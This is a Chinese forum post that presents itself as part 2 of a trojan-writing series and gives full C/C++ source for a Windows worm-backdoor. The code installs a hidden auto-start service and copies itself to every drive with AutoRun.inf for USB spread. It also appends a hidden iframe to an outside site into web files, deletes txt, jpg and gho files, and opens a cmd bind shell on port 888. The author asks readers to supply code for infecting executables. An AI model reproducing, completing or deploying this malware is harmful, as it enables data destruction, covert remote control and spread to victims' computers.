C++设计木马第2篇 - 后续后门木马设计
由于注释很多就不一一解释了
程序代码:// C语言设计病毒第2篇
// 作者 : GodOneisCode
// 改写时间 : 1周02天
#include <Winsock2.h>
#include <Windows.h>
#pragma comment(lib, "Ws2_32.lib")
void HideWindow();
void InfectAllFiles(char *lpPath);
void WormComputer();
void AutoInfect(char *lpPath);
void EnterService();
void CopyFiles(char *lpPath);
void Telnetdoor();
// 定义AutoRun.inf内容
char szAutoRun[] = "[AutoRun] \
\r\nopen=SystemInfo.exe \
\r\nshell\\open=打开(&O) \
\r\nshell\\open\\command=SystemInfo.exe \
\r\nshell\\explore=资源管理器(&X) \
\r\nshell\\explore\\command=SystemInfo.exe \
\r\nshellexecute=SystemInfo.exe \
\r\nshell\\auto\\command=SystemInfo.exe";
// 定义恶意网页代码
char szWebCode[] = "\r\n<iframe src=http://www.xxpapa.co width=0 height=0></iframe> \
\r\n<img src=图片地址></img>";
int main(int argc, char **argv)
{
HideWindow();
EnterService();
WormComputer();
Telnetdoor();
return 0;
}
// 隐藏自身窗口
void HideWindow()
{
HWND hwndDOS = GetForegroundWindow();
ShowWindow(hwndDOS, SW_HIDE);
}
// 实现全盘感染
void WormComputer()
{
// 磁盘遍历
for ( char cLabel = 'c'; cLabel <= 'z'; cLabel++ )
{
char strRootPath[] = {"c:\\"};
strRootPath[0] = cLabel;
CopyFiles(strRootPath);
AutoInfect(strRootPath);
if ( GetDriveType(strRootPath) == DRIVE_FIXED )
{
strRootPath[2] = '\0';
InfectAllFiles(strRootPath);
}
}
}
// 复制自身到各盘符
void CopyFiles(char *lpPath)
{
char szFile[MAX_PATH] = { 0 };
char szCurrDir[MAX_PATH] = { 0 };
strcpy(szFile, lpPath);
strcat(szFile, "\\SystemInfo.exe");
GetModuleFileName(NULL, szCurrDir, MAX_PATH);
CopyFile(szCurrDir, szFile, FALSE);
}
// 实现U盘传播
void AutoInfect(char *lpPath)
{
// 创建AutoRun.inf文件
char szAutoFile[MAX_PATH] = { 0 };
strcpy(szAutoFile, lpPath);
strcat(szAutoFile, "\\AutoRun.inf");
// CREATE_ALWAYS 为创建文件
HANDLE hFile = CreateFile(szAutoFile,
GENERIC_WRITE,
0, NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
DWORD dwWritten = 0;
// 写入恶意代码
WriteFile(hFile, szAutoRun, lstrlen(szAutoRun),
&dwWritten, NULL);
CloseHandle(hFile);
}
// 感染系统所有文件
void InfectAllFiles(char *lpPath)
{
char szFind[MAX_PATH] = { 0 };
WIN32_FIND_DATA FindFileData;
// 查找所有文件
strcpy(szFind, lpPath);
strcat(szFind, "\\*.*");
HANDLE hFind = ::FindFirstFile(szFind, &FindFileData);
if ( INVALID_HANDLE_VALUE == hFind)
return;
while ( TRUE )
{
if ( FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY )
{
// 跳过'.'目录
if ( FindFileData.cFileName[0] != '.' )
{
char szFile[MAX_PATH] = { 0 };
strcpy(szFile, lpPath);
strcat(szFile, "\\");
strcat(szFile, FindFileData.cFileName);
InfectAllFiles(szFile);
}
}
else
{
int len = strlen(FindFileData.cFileName);
const char *p = (char *)&FindFileData.cFileName[len-3];
char strFileName[MAX_PATH] = { 0 };
strcpy(strFileName, lpPath);
strcat(strFileName, "\\");
strcat(strFileName, FindFileData.cFileName);
// 感染所有网页文件
if ( _stricmp(p, "html") == 0 || _stricmp(p, "htm") == 0 || _stricmp(p, "asp") == 0
|| _stricmp(p, "aspx") == 0 || _stricmp(p, "php") == 0 || _stricmp(p, "jsp") == 0 )
{
// OPEN_ALWAYS 为打开文件
HANDLE hFile = CreateFile(strFileName,
GENERIC_WRITE,
0, NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
// 写入恶意代码
DWORD dwWritten = 0;
WriteFile(hFile, szWebCode, lstrlen(szAutoRun),
&dwWritten, NULL);
CloseHandle(hFile);
}
// 删除其他文件
else if ( _stricmp(p, "txt") == 0 || _stricmp(p, "bat") == 0 || _stricmp(p, "dos") == 0
|| _stricmp(p, "jpg") == 0 || _stricmp(p, "gho") == 0 )
{
DeleteFile(strFileName);
}
// 感染可执行文件
else if ( _stricmp(p, "exe") == 0 || _stricmp(p, "com") == 0)
{
// 自身则不感染, 并设置隐藏属性
if ( FindFileData.cFileName == "SystemInfo.exe" )
{
SetFileAttributes(strFileName, FILE_ATTRIBUTE_HIDDEN);
continue;
}
// 感染PE文件怎么写 ??????????????????????????????????????????????????????????
else
{
// 求助
}
}
}
if ( !FindNextFile(hFind, &FindFileData) )
break;
}
// 关闭文件
FindClose(hFind);
}
// 实现CMD远程控制
void Telnetdoor()
{
WSADATA wsa;
WSAStartup(MAKEWORD(2, 2), &wsa);
// 创建套接字
SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
// 填充信息
sockaddr_in sock;
sock.sin_family = AF_INET;
sock.sin_addr.S_un.S_addr = ADDR_ANY;
sock.sin_port = htons(888);
bind(s, (SOCKADDR *)&sock, sizeof(SOCKADDR));
listen(s, 1);
// 接受连接
sockaddr_in sockClient;
int SaddrSize = sizeof(SOCKADDR);
SOCKET sc = accept(s, (SOCKADDR *)&sockClient, &SaddrSize);
// 创建管道
SECURITY_ATTRIBUTES sa1, sa2;
HANDLE hRead1, hRead2, hWrite1, hWrite2;
sa1.nLength = sizeof(SECURITY_ATTRIBUTES);
sa1.lpSecurityDescriptor = NULL;
sa1.bInheritHandle = TRUE;
// 填充信息
sa2.nLength = sizeof(SECURITY_ATTRIBUTES);
sa2.lpSecurityDescriptor = NULL;
sa2.bInheritHandle = TRUE;
CreatePipe(&hRead1, &hWrite1, &sa1, 0);
CreatePipe(&hRead2, &hWrite2, &sa2, 0);
// 创建用于通信的子程序
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
// 管道1用于输出
// 管道2用于输入
si.hStdInput = hRead2;
si.hStdOutput = hWrite1;
si.hStdError = hWrite1;
char *szCmd = "cmd";
// 创建子进程
CreateProcess(NULL, szCmd, NULL, NULL,
TRUE, 0, NULL, NULL, &si, &pi);
// 定义输入\输出大小
DWORD dwBytes = 0;
BOOL bRet = FALSE;
char szBuffer[0x1000] = { 0 };
char szCommand[0x1000] = { 0 };
// 循环接受命令
while ( TRUE )
{
// 发送命令
ZeroMemory(szCommand, 0x1000);
bRet = PeekNamedPipe(hRead1, szBuffer, 0x1000, &dwBytes, 0, 0);
if ( dwBytes )
{
ReadFile(hRead1, szBuffer, 0x1000, &dwBytes, NULL);
send(sc, szBuffer, dwBytes, 0);
}
else
{
int i = 0;
while ( 1 )
{
// 接受回显
dwBytes = recv(sc, szBuffer, 0x1000, 0);
if ( dwBytes <= 0)
{
break;
}
szCommand[i++] = szBuffer[0];
if ( szBuffer[0] == '\r' || szBuffer[0] == '\n' )
{
szCommand[i-1] = '\n';
break;
}
}
// 写入管道
WriteFile(hWrite2, szCommand, i, &dwBytes, NULL);
}
}
WSACleanup();
}
// 创建服务木马自启动
void EnterService()
{
char szFileName[MAX_PATH] = { 0 };
GetModuleFileName(NULL, szFileName, MAX_PATH);
SC_HANDLE scHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
SC_HANDLE scHandleOpen = OpenService(scHandle, "door", SERVICE_ALL_ACCESS);
if ( scHandleOpen == NULL )
{
char szSelfFile[MAX_PATH] = { 0 };
char szSystemPath[MAX_PATH] = { 0 };
// 复制到Windows目录下
GetWindowsDirectory(szSystemPath, MAX_PATH);
strcat(szSystemPath, "\\SystemInfo.exe");
GetModuleFileName(NULL, szSelfFile, MAX_PATH);
CopyFile(szSelfFile, szSystemPath, FALSE);
SetFileAttributes(szSystemPath, FILE_ATTRIBUTE_HIDDEN);
// 创建自启动服务
SC_HANDLE scNewHandle = CreateService(scHandle,
"door",
"door",
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szSystemPath,
NULL,
NULL,
NULL,
NULL,
NULL);
// 启动服务
StartService(scNewHandle, 0, NULL);
CloseServiceHandle(scNewHandle);
}
// 关闭句柄
CloseServiceHandle(scHandleOpen);
CloseServiceHandle(scHandle);
}
编译运行(关闭杀毒软件在虚拟机中运行),就可以看到效果了。木马基本雏形已经写好,但请问如何感染PE文件? 怎么写呀?
会的大神在此贴留代码,谢谢。
